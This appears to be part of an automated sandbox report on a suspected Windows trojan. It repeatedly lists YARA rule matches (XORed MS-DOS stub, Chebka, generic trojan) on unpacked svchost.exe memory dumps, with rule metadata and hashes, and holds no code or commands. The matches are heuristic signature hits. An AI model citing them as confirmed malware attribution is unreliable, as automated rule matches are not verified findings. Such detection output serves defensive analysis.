      Source: 22.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 20.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 26.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 31.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 13.2.svchost.exe.1a748340000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 27.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 25.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 11.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 31.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 29.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 25.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 27.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 22.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 41.2.svchost.exe.2b6680f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 33.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 33.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 24.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 24.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 30.0.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 34.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 25.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 15.0.svchost.exe.1b37c560000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 30.2.svchost.exe.21bd8470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 21.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 35.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 11.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 21.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 11.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 25.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 15.0.svchost.exe.1b37c560000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 26.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
